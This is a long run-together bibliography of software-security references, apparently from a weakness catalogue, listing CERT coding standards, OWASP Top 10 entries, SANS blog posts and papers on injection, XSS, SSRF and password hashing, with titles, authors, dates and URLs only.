http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A10 Insecure Configuration Management - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - Jason Lam - Top 25 Series - Rank 21 - Incorrect Permission Assignment for Critical Response - 2010 - --03 - ---24 - SANS Software Security Institute - http://software-security.sans.org/blog/2010/03/24/top-25-series-rank-21-incorrect-permission-assignment-for-critical-response - - - Robert C. Seacord - The CERT C Secure Coding Standard - 1st Edition - 2008 - --10 - ---14 - Addison-Wesley Professional - - - The Software Engineering Institute - SEI CERT C Coding Standard - https://wiki.sei.cmu.edu/confluence/display/c/SEI+CERT+C+Coding+Standard - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 01. Preprocessor (PRE) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152276 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 02. Declarations and Initialization (DCL) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152215 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 03. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152200 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 04. Integers (INT) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152052 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 05. Floating Point (FLP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152181 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 06. Arrays (ARR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152051 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 07. Characters and Strings (STR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152038 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 08. Memory Management (MEM) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152142 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 09. Input Output (FIO) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152270 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 10. Environment (ENV) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152421 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 11. Signals (SIG) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152469 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 12. Error Handling (ERR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152345 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 13. Application Programming Interfaces (API) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152242 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 14. Concurrency (CON) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152257 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 48. Miscellaneous (MSC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152201 - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 50. POSIX (POS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87152405 - - - 2009 CWE/SANS Top 25 Most Dangerous Programming Errors - 2009 - --01 - ---12 - http://cwe.mitre.org/top25/archive/2009/2009_cwe_sans_top25.html - - - The Software Engineering Institute - SEI CERT C Coding Standard : Rule 51. Microsoft Windows (WIN) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=87151925 - - - Frank Kim - Top 25 Series - Rank 15 - Improper Check for Unusual or Exceptional Conditions - 2010 - --03 - ---15 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/15/top-25-series-rank-15-improper-check-for-unusual-or-exceptional-conditions/ - - - OWASP - Password Storage Cheat Sheet - https://www.owasp.org/index.php/Password_Storage_Cheat_Sheet - - - Thomas Ptacek - Enough With The Rainbow Tables: What You Need To Know About Secure Password Schemes - 2007 - --09 - ---10 - http://www.securityfocus.com/blogs/262 - - - Robert Graham - The Importance of Being Canonical - 2009 - --02 - ---02 - http://erratasec.blogspot.com/2009/02/importance-of-being-canonical.html - - - James McGlinn - Password Hashing - http://phpsec.org/articles/2005/password-hashing.html - - - Jeff Atwood - Rainbow Hash Cracking - 2007 - --09 - ---08 - http://www.codinghorror.com/blog/archives/000949.html - - - Jeff Atwood - Speed Hashing - 2012 - --04 - ---06 - http://www.codinghorror.com/blog/2012/04/speed-hashing.html - - - Rainbow table - 2009 - --03 - ---03 - Wikipedia - http://en.wikipedia.org/wiki/Rainbow_table - - - boost C++ Library Smart Pointers - http://www.boost.org/doc/libs/1_38_0/libs/smart_ptr/smart_ptr.htm - - - getrlimit(2) — Linux manual page - http://www.kernel.org/doc/man-pages/online/pages/man2/setrlimit.2.html - - - Rafal Los - Real-Life Example of a 'Business Logic Defect' (Screen Shots!) - 2011 - http://h30501.www3.hp.com/t5/Following-the-White-Rabbit-A/Real-Life-Example-of-a-Business-Logic-Defect-Screen-Shots/ba-p/22581 - - - Frank Kim - Top 25 Series - Rank 22 - Allocation of Resources Without Limits or Throttling - 2010 - --03 - ---23 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/23/top-25-series-rank-22-allocation-of-resources-without-limits-or-throttling/ - - - Amit Klein - Multiple vendors XML parser (and SOAP/WebServices server) Denial of Service attack using DTD - 2002 - --12 - ---16 - http://www.securityfocus.com/archive/1/303509 - - - Rami Jaamour - XML security: Preventing XML bombs - 2006 - --02 - ---22 - http://searchsoftwarequality.techtarget.com/expert/KnowledgebaseAnswer/0,289625,sid92_gci1168442,00.html?asrc=SS_CLA_302%20%20558&psrc=CLT_92# - - - Didier Stevens - Dismantling an XML-Bomb - 2008 - --09 - ---23 - http://blog.didierstevens.com/2008/09/23/dismantling-an-xml-bomb/ - - - Robert Auger - XML Entity Expansion - http://projects.webappsec.org/XML-Entity-Expansion - - - Elliotte Rusty Harold - Tip: Configure SAX parsers for secure processing - 2005 - --05 - ---27 - http://www.ibm.com/developerworks/xml/library/x-tipcfsx.html - - - Blaise Doughan - Preventing Entity Expansion Attacks in JAXB - 2011 - --03 - ---11 - http://blog.bdoughan.com/2011/03/preventing-entity-expansion-attacks-in.html - - - Pascal Meunier - Meta-Character Vulnerabilities - 2008 - --02 - ---20 - http://www.cs.purdue.edu/homes/cs390s/slides/week09.pdf - - - Robert Auger - OS Commanding - 2009 - --06 - http://projects.webappsec.org/OS-Commanding - - - Lincoln Stein - John Stewart - The World Wide Web Security FAQ - 2002 - --02 - ---04 - http://www.w3.org/Security/Faq/wwwsf4.html - - - Jordan Dimov, Cigital - Security Issues in Perl Scripts - http://www.cgisecurity.com/lib/sips.html - - - Frank Kim - Top 25 Series - Rank 9 - OS Command Injection - 2010 - --02 - ---24 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/02/24/top-25-series-rank-9-os-command-injection/ - - - Ronald L. Rivest - Burt Kaliski - RSA Problem - 2003 - --12 - ---10 - http://people.csail.mit.edu/rivest/RivestKaliski-RSAProblem.pdf - - - Optimal Asymmetric Encryption Padding - 2009 - --07 - ---08 - Wikipedia - http://en.wikipedia.org/wiki/Optimal_Asymmetric_Encryption_Padding - - - Ruben Santamarta - Exploiting Common Flaws in Drivers - 2007 - --07 - ---11 - http://reversemode.com/index.php?option=com_content&task=view&id=38&Itemid=1 - - - Yuriy Bulygin - Remote and Local Exploitation of Network Drivers - 2007 - --08 - ---01 - https://www.blackhat.com/presentations/bh-usa-07/Bulygin/Presentation/bh-usa-07-bulygin.pdf - - - Anibal Sacco - Windows driver vulnerabilities: the METHOD_NEITHER odyssey - 2008 - --10 - http://www.net-security.org/dl/insecure/INSECURE-Mag-18.pdf - - - Microsoft - Buffer Descriptions for I/O Control Codes - http://msdn.microsoft.com/en-us/library/ms795857.aspx - - - Microsoft - Using Neither Buffered Nor Direct I/O - http://msdn.microsoft.com/en-us/library/cc264614.aspx - - - Microsoft - Securing Device Objects - http://msdn.microsoft.com/en-us/library/ms794722.aspx - - - Piotr Bania - Exploiting Windows Device Drivers - http://www.piotrbania.com/all/articles/ewdd.pdf - - - CERT - EXP00-C. Use parentheses for precedence of operation - https://www.securecoding.cert.org/confluence/display/seccode/EXP00-C.+Use+parentheses+for+precedence+of+operation - - - Steve Christey - Unforgivable Vulnerabilities - 2007 - --08 - ---02 - http://cve.mitre.org/docs/docs-2007/unforgivable.pdf - - - Jeremiah Grossman - Robert "RSnake" Hansen - Petko "pdp" D. Petkov - Anton Rager - Seth Fogie - XSS Attacks - 2007 - Syngress - - - Cross-site scripting - 2008 - --08 - ---26 - Wikipedia - http://en.wikipedia.org/wiki/Cross-site_scripting - - - RSnake - XSS (Cross Site Scripting) Cheat Sheet - http://ha.ckers.org/xss.html - - - Microsoft - Mitigating Cross-site Scripting With HTTP-only Cookies - http://msdn.microsoft.com/en-us/library/ms533046.aspx - - - Mark Curphey, Microsoft - Anti-XSS 3.0 Beta and CAT.NET Community Technology Preview now Live! - http://blogs.msdn.com/cisg/archive/2008/12/15/anti-xss-3-0-beta-and-cat-net-community-technology-preview-now-live.aspx - - - Ivan Ristic - XSS Defense HOWTO - http://blog.modsecurity.org/2008/07/do-you-know-how.html - - - OWASP - Web Application Firewall - http://www.owasp.org/index.php/Web_Application_Firewall - - - Web Application Security Consortium - Web Application Firewall Evaluation Criteria - http://www.webappsec.org/projects/wafec/v1/wasc-wafec-v1.0.html - - - RSnake - Firefox Implements httpOnly And is Vulnerable to XMLHTTPRequest - 2007 - --07 - ---19 - - - XMLHttpRequest allows reading HTTPOnly cookies - Mozilla - https://bugzilla.mozilla.org/show_bug.cgi?id=380418 - - - Apache Wicket - http://wicket.apache.org/ - - - OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet - http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet - - - OWASP - DOM based XSS Prevention Cheat Sheet - http://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet - - - Jason Lam - Top 25 series - Rank 1 - Cross Site Scripting - 2010 - --02 - ---22 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/02/22/top-25-series-rank-1-cross-site-scripting/ - - - Johannes Ullrich - Top 25 Series - Rank 11 - Hardcoded Credentials - 2010 - --03 - ---10 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/10/top-25-series-rank-11-hardcoded-credentials/ - - - Web Application Security Consortium - Insufficient Anti-automation - http://projects.webappsec.org/Insufficient+Anti-automation - - - 2010 CWE/SANS Top 25 Most Dangerous Software Errors - 2010 - --02 - ---04 - http://cwe.mitre.org/top25/archive/2010/2010_cwe_sans_top25.html - - - Jason Lam - Top 25 Series - Rank 12 - Buffer Access with Incorrect Length Value - 2010 - --03 - ---11 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/11/top-25-series-rank-12-buffer-access-with-incorrect-length-value/ - - - Frank Kim - Top 25 Series - Rank 6 - Reliance on Untrusted Inputs in a Security Decision - 2010 - --03 - ---05 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/05/top-25-series-rank-6-reliance-on-untrusted-inputs-in-a-security-decision/ - - - Scott Mitchell - Understanding ASP.NET View State - 2004 - --05 - ---15 - Microsoft - http://msdn.microsoft.com/en-us/library/ms972976.aspx - - - Top 10 2010 - 2010 - --04 - ---19 - OWASP - https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2010 - - - OWASP - Top 10 2010-A1-Injection - http://www.owasp.org/index.php/Top_10_2010-A1-Injection - - - OWASP - Top 10 2010-A2-Cross-Site Scripting (XSS) - http://www.owasp.org/index.php/Top_10_2010-A2-Cross-Site_Scripting_%28XSS%29 - - - OWASP - Top 10 2010-A3-Broken Authentication and Session Management - http://www.owasp.org/index.php/Top_10_2010-A3-Broken_Authentication_and_Session_Management - - - OWASP - Top 10 2010-A4-Insecure Direct Object References - http://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References - - - OWASP - Top 10 2010-A5-Cross-Site Request Forgery (CSRF) - http://www.owasp.org/index.php/Top_10_2010-A5-Cross-Site_Request_Forgery_%28CSRF%29 - - - OWASP - Top 10 2010-A6-Security Misconfiguration - http://www.owasp.org/index.php/Top_10_2010-A6-Security_Misconfiguration - - - OWASP - Top 10 2010-A7-Insecure Cryptographic Storage - http://www.owasp.org/index.php/Top_10_2010-A7-Insecure_Cryptographic_Storage - - - OWASP - Top 10 2010-A8-Failure to Restrict URL Access - http://www.owasp.org/index.php/Top_10_2010-A8-Failure_to_Restrict_URL_Access - - - OWASP - Top 10 2010-A9-Insufficient Transport Layer Protection - http://www.owasp.org/index.php/Top_10_2010-A9-Insufficient_Transport_Layer_Protection - - - OWASP - Top 10 2010-A10-Unvalidated Redirects and Forwards - http://www.owasp.org/index.php/Top_10_2010-A10-Unvalidated_Redirects_and_Forwards - - - Daniel Kulp - Apache CXF Security Advisory (CVE-2010-2076) - 2010 - --06 - ---16 - http://svn.apache.org/repos/asf/cxf/trunk/security/CVE-2010-2076.pdf - - - Jeremiah Grossman - Third-Party Web Widget Security FAQ - http://jeremiahgrossman.blogspot.com/2010/07/third-party-web-widget-security-faq.html - - - Robert C. Seacord - Secure Coding in C and C++ - 2006 - Addison Wesley - - - Jim Manico - Injection-safe templating languages - 2010 - --06 - ---30 - http://manicode.blogspot.com/2010/06/injection-safe-templating-languages_30.html - - - Dinis Cruz - Can we please stop saying that XSS is boring and easy to fix! - 2010 - --09 - ---25 - http://diniscruz.blogspot.com/2010/09/can-we-please-stop-saying-that-xss-is.html - - - Ivan Ristic - Canoe: XSS prevention via context-aware output encoding - 2010 - --09 - ---24 - http://blog.ivanristic.com/2010/09/introducing-canoe-context-aware-output-encoding-for-xss-prevention.html - - - Jim Manico - What is the Future of Automated XSS Defense Tools? - 2011 - --03 - ---08 - http://software-security.sans.org/downloads/appsec-2011-files/manico-appsec-future-tools.pdf - - - Jeremiah Grossman - Business Logic Flaws and Yahoo Games - 2006 - --12 - ---08 - http://jeremiahgrossman.blogspot.com/2006/12/business-logic-flaws.html - - - Jeremiah Grossman - Seven Business Logic Flaws That Put Your Website At Risk - 2007 - --10 - http://www.whitehatsec.com/home/assets/WP_bizlogic092407.pdf - - - WhiteHat Security - Business Logic Flaws - http://www.whitehatsec.com/home/solutions/BL_auction.html - - - WASC - Abuse of Functionality - http://projects.webappsec.org/w/page/13246913/Abuse-of-Functionality - - - Rafal Los - Prajakta Jagdale - Defying Logic: Theory, Design, and Implementation of Complex Systems for Testing Application Logic - 2011 - http://www.slideshare.net/RafalLos/defying-logic-business-logic-testing-with-automation - - - Viktoria Felmetsger - Ludovico Cavedon - Christopher Kruegel - Giovanni Vigna - Toward Automated Detection of Logic Vulnerabilities in Web Applications - USENIX Security Symposium 2010 - 2010 - --08 - http://www.usenix.org/events/sec10/tech/full_papers/Felmetsger.pdf - - - Faisal Nabi - Designing a Framework Method for Secure Business Application Logic Integrity in e-Commerce Systems - International Journal of Network Security, Vol.12, No.1 - 2011 - http://ijns.femto.com.tw/contents/ijns-v12-n1/ijns-2011-v12-n1-p29-41.pdf - - - WASC - Insufficient Process Validation - http://projects.webappsec.org/w/page/13246943/Insufficient-Process-Validation - - - Mark Dowd - Ryan Smith - David Dewey - Attacking Interoperability - 2009 - http://www.azimuthsecurity.com/resources/bh2009_dowd_smith_dewey.pdf - - - Fred Long - Dhruv Mohindra - Robert C. Seacord - Dean F. Sutherland - David Svoboda - The CERT Oracle Coding Standard for Java - 1st Edition - 2011 - --09 - ---18 - Addison-Wesley Professional - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 00. Input Validation and Data Sanitization (IDS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487865 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 01. Declarations and Initialization (DCL) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487858 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 02. Expressions (EXP) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487704 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 03. Numeric Types and Operations (NUM) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487628 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 05. Object Orientation (OBJ) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487715 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 06. Methods (MET) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487441 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 07. Exceptional Behavior (ERR) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487665 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 08. Visibility and Atomicity (VNA) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487824 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 09. Locking (LCK) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487666 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 10. Thread APIs (THI) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487735 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 11. Thread Pools (TPS) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487728 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 12. Thread-Safety Miscellaneous (TSM) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487731 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 13. Input Output (FIO) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487725 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 14. Serialization (SER) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487787 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 15. Platform Security (SEC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487683 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 16. Runtime Environment (ENV) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487764 - - - The Software Engineering Institute - SEI CERT Oracle Coding Standard for Java : Rule 49. Miscellaneous (MSC) - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88487686 - - - 2011 CWE/SANS Top 25 Most Dangerous Software Errors - 2011 - --06 - ---27 - http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.html - - - The Software Engineering Institute - SEI CERT C++ Coding Standard - https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88046682 - - - The Software Engineering Institute - 01. Preprocessor (PRE) - https://www.securecoding.cert.org/confluence/display/cplusplus/01.+Preprocessor+%28PRE%29 - - - CERT - 02. Declarations and Initialization (DCL) - https://www.securecoding.cert.org/confluence/display/cplusplus/02.+Declarations+and+Initialization+%28DCL%29 - - - CERT - 03. Expressions (EXP) - https://www.securecoding.cert.org/confluence/display/cplusplus/03.+Expressions+%28EXP%29 - - - CERT - 04. Integers (INT) - https://www.securecoding.cert.org/confluence/display/cplusplus/04.+Integers+%28INT%29 - - - CERT - 05. Floating Point Arithmetic (FLP) - https://www.securecoding.cert.org/confluence/display/cplusplus/05.+Floating+Point+Arithmetic+%28FLP%29 - - - CERT - 06. Arrays and the STL (ARR) - https://www.securecoding.cert.org/confluence/display/cplusplus/06.+Arrays+and+the+STL+%28ARR%29 - - - CERT - 07. Characters and Strings (STR) - https://www.securecoding.cert.org/confluence/display/cplusplus/07.+Characters+and+Strings+%28STR%29 - - - CERT - 08. Memory Management (MEM) - https://www.securecoding.cert.org/confluence/display/cplusplus/08.+Memory+Management+%28MEM%29 - - - CERT - 09. Input Output (FIO) - https://www.securecoding.cert.org/confluence/display/cplusplus/09.+Input+Output+%28FIO%29 - - - CERT - 10. Environment (ENV) - https://www.securecoding.cert.org/confluence/display/cplusplus/10.+Environment+%28ENV%29 - - - CERT - 11. Signals (SIG) - https://www.securecoding.cert.org/confluence/display/cplusplus/11.+Signals+%28SIG%29 - - - Steven Christey - Argument injection issues - http://www.securityfocus.com/archive/1/archive/1/460089/100/100/threaded - - - CERT - 12. Exceptions and Error Handling (ERR) - https://www.securecoding.cert.org/confluence/display/cplusplus/12.+Exceptions+and+Error+Handling+%28ERR%29 - - - CERT - 13. Object Oriented Programming (OOP) - https://www.securecoding.cert.org/confluence/display/cplusplus/13.+Object+Oriented+Programming+%28OOP%29 - - - CERT - 14. Concurrency (CON) - https://www.securecoding.cert.org/confluence/display/cplusplus/14.+Concurrency+%28CON%29 - - - CERT - 49. Miscellaneous (MSC) - https://www.securecoding.cert.org/confluence/display/cplusplus/49.+Miscellaneous+%28MSC%29 - - - OWASP - SQL Injection Prevention Cheat Sheet - http://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet - - - Steven Friedl - SQL Injection Attacks by Example - 2007 - --10 - ---10 - http://www.unixwiz.net/techtips/sql-injection.html - - - Ferruh Mavituna - SQL Injection Cheat Sheet - 2007 - --03 - ---15 - http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ - - - David Litchfield - Chris Anley - John Heasman - Bill Grindlay - The Database Hacker's Handbook: Defending Database Servers - 2005 - --07 - ---14 - Wiley - - - David Litchfield - The Oracle Hacker's Handbook: Hacking and Defending Oracle - 2007 - --01 - ---30 - Wiley - - - Microsoft - SQL Injection - 2008 - --12 - http://msdn.microsoft.com/en-us/library/ms161953.aspx - - - Microsoft Security Vulnerability Research & Defense - SQL Injection Attack - http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx - - - Michael Howard - Giving SQL Injection the Respect it Deserves - 2008 - --05 - ---15 - http://blogs.msdn.com/sdl/archive/2008/05/15/giving-sql-injection-the-respect-it-deserves.aspx - - - Frank Kim - Top 25 Series - Rank 2 - SQL Injection - 2010 - --03 - ---01 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/01/top-25-series-rank-2-sql-injection/ - - - SPI Dynamics - Web Applications and LDAP Injection - - - Amit Klein - Blind XPath Injection - 2004 - --05 - ---19 - http://www.modsecurity.org/archive/amit/blind-xpath-injection.pdf - - - Mateusz "j00ru" Jurczyk - Windows Kernel Reference Count Vulnerabilities - Case Study - 2012 - --11 - http://j00ru.vexillium.org/dump/zn_slides.pdf - - - Stefan Esser - Shocking News in PHP Exploitation - 2009 - http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf - - - Dinis Cruz - "Two Security Vulnerabilities in the Spring Framework's MVC" pdf (from 2008) - http://blog.diniscruz.com/2011/07/two-security-vulnerabilities-in-spring.html - - - Ryan Berg - Dinis Cruz - Two Security Vulnerabilities in the Spring Framework's MVC - http://o2platform.files.wordpress.com/2011/07/ounce_springframework_vulnerabilities.pdf - - - ASPNETUE - Best Practices for ASP.NET MVC - 2010 - --09 - ---17 - http://blogs.msdn.com/b/aspnetue/archive/2010/09/17/second_2d00_post.aspx - - - Michael Hartl - Mass assignment in Rails applications - 2008 - --09 - ---21 - http://blog.mhartl.com/2008/09/21/mass-assignment-in-rails-applications/ - - - Tobi - Secure your Rails apps! - 2012 - --03 - ---06 - http://pragtob.wordpress.com/2012/03/06/secure-your-rails-apps/ - - - Heiko Webers - Ruby On Rails Security Guide - http://guides.rubyonrails.org/security.html#mass-assignment - - - Josh Bush - Mass Assignment Vulnerability in ASP.NET MVC - 2012 - --03 - ---05 - http://freshbrewedcode.com/joshbush/2012/03/05/mass-assignment-aspnet-mvc/ - - - K. Scott Allen - 6 Ways To Avoid Mass Assignment in ASP.NET MVC - 2012 - --03 - ---12 - http://odetocode.com/blogs/scott/archive/2012/03/11/complete-guide-to-mass-assignment-in-asp-net-mvc.aspx - - - Egidio Romano - PHP Object Injection - 2013 - --01 - ---22 - https://www.owasp.org/index.php/PHP_Object_Injection - - - Solar Designer - Password hashing at scale - 2012 - --10 - ---01 - http://www.openwall.com/presentations/YaC2012-Password-Hashing-At-Scale/ - - - Solar Designer - New developments in password hashing: ROM-port-hard functions - 2012 - --11 - http://www.openwall.com/presentations/ZeroNights2012-New-In-Password-Hashing/ - - - Stefano Di Paola - Arshan Dabirsiaghi - Expression Language Injection - 2011 - --09 - ---12 - http://www.mindedsecurity.com/fileshare/ExpressionLanguageInjection.pdf - - - Dan Amodio - Remote Code with Expression Language Injection - 2012 - --12 - ---14 - http://danamodio.com/application-security/discoveries/spring-remote-code-with-expression-language-injection/ - - - Alexander Polyakov - Dmitry Chastukhin - SSRF vs. Business-critical applications: XXE tunneling in SAP - 2012 - --07 - ---26 - https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf - - - Alexander Polyakov - Dmitry Chastukhin - Alexey Tyurin - SSRF vs. Business-critical Applications. Part 1: XXE Tunnelling in SAP NetWeaver - http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-Businness-critical-applications-whitepaper.pdf - - - Riyaz Ahemed Walikar - Cross Site Port Attacks - XSPA - Part 1 - 2012 - --11 - ---07 - https://ibreak.software/2012/11/cross-site-port-attacks-xspa-part-1/ - - - Riyaz Ahemed Walikar - Cross Site Port Attacks - XSPA - Part 2 - 2012 - --11 - ---13 - https://ibreak.software/2012/11/cross-site-port-attacks-xspa-part-2/ - - - Riyaz Ahemed Walikar - Cross Site Port Attacks - XSPA - Part 3 - 2012 - --11 - ---14 - https://ibreak.software/2012/11/cross-site-port-attacks-xspa-part-3/ - - - Vladimir Vorontsov - Alexander Golovko - SSRF attacks and sockets: smorgasbord of vulnerabilities - http://www.slideshare.net/d0znpp/ssrf-attacks-and-sockets-smorgasbord-of-vulnerabilities - - - ONsec Lab - SSRF bible. Cheatsheet - 2013 - --01 - ---26 - https://docs.google.com/document/d/1v1TkWZtrhzRLy0bYXBcdLUedXGb9njTNIJXa3u9akHM/edit?pli=1# - - - Deral Heiland - Web Portals: Gateway To Information, Or A Hole In Our Perimeter Defenses - 2008 - --02 - http://www.shmoocon.org/2008/presentations/Web%20portals,%20gateway%20to%20information.ppt - - - Android Open Source Project - Security Tips - 2013 - --07 - ---16 - http://developer.android.com/training/articles/security-tips.html#StoringData - - - Erika Chin - Adrienne Porter Felt - Kate Greenwood - David Wagner - Analyzing Inter-Application Communication in Android - http://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf - - - Android Open Source Project - Security Tips - 2013 - --07 - ---16 - http://developer.android.com/training/articles/security-tips.html#ContentProviders - - - Top 10 2013 - 2013 - --06 - ---12 - OWASP - https://www.owasp.org/index.php/Top_10_2013 - - - OWASP - Top 10 2013-A1-Injection - https://www.owasp.org/index.php/Top_10_2013-A1-Injection - - - Ulf Harnhammar - CRLF Injection - Bugtraq - 2002 - --05 - ---07 - http://marc.info/?l=bugtraq&m=102088154213630&w=2 - - - OWASP - Top 10 2013-A2-Broken Authentication and Session Management - https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management - - - OWASP - Top 10 2013-A3-Cross-Site Scripting (XSS) - https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_%28XSS%29 - - - OWASP - Top 10 2013-A4-Insecure Direct Object References - https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References - - - OWASP - Top 10 2013-A5-Security Misconfiguration - https://www.owasp.org/index.php/Top_10_2013-A5-Security_Misconfiguration - - - OWASP - Top 10 2013-A6-Sensitive Data Exposure - https://www.owasp.org/index.php/Top_10_2013-A6-Sensitive_Data_Exposure - - - OWASP - Top 10 2013-A7-Missing Function Level Access Control - https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control - - - OWASP - Top 10 2013-A8-Cross-Site Request Forgery (CSRF) - https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_%28CSRF%29 - - - OWASP - Top 10 2013-A9-Using Components with Known Vulnerabilities - https://www.owasp.org/index.php/Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities - - - OWASP - Top 10 2013-A10-Unvalidated Redirects and Forwards - https://www.owasp.org/index.php/Top_10_2013-A10-Unvalidated_Redirects_and_Forwards - - - Guillaume Ross - Scheming for Privacy and Security - 2013 - --11 - ---11 - http://brooksreview.net/2013/11/guest-post_scheming-for-privacy-and-security/ - - - US-CERT - UDP-based Amplification Attacks - 2014 - --01 - ---17 - https://www.us-cert.gov/ncas/alerts/TA14-017A - - - Fortify - Android Bad Practices: Sticky Broadcast - http://www.hpenterprisesecurity.com/vulncat/en/vulncat/java/android_bad_practices_sticky_broadcast.html - - - Apurva Udaykumar - Setting a crossdomain.xml file for HTTP streaming - 2012 - --11 - ---19 - Adobe - http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for-streaming.html - - - Adobe - Cross-domain policy for Flash movies - Adobe - http://kb2.adobe.com/cps/142/tn_14213.html - - - Microsoft Corporation - HTTP Communication and Security with Silverlight - http://msdn.microsoft.com/en-us/library/cc838250.aspx - - - Microsoft Corporation - Network Security Access Restrictions in Silverlight - http://msdn.microsoft.com/en-us/library/cc645032.aspx - - - Dongseok Jang - Aishwarya Venkataraman - G. Michael Sawka - 